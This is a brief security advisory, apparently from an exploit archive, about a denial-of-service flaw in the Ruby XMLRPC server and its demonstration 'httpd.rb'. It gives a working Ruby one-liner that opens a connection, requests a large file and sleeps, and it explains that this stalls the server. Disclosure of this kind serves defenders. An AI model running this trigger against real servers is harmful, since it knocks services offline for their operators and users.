Yukihiro Matsumoto Ruby XMLRPC Server Denial of Service Vulnerability

Yukihiro Matsumoto Ruby XMLRPC Server Denial of Service Vulnerability

Attackers exploit this issue with standard network utilities.

The following Ruby command will issue a request sufficient to trigger this issue:

ruby -rsocket -e 'TCPSocket.open("www.example.com", 10080) {|s|
s.print "GET /z HTTP/1.0\r\n\r\n"
sleep
}'

This is demonstrated to work with the Ruby demonstration 'httpd.rb' file. By placing a 100k file in the document root of the demonstration server called 'z', and then executing this Ruby command, further requests will be denied.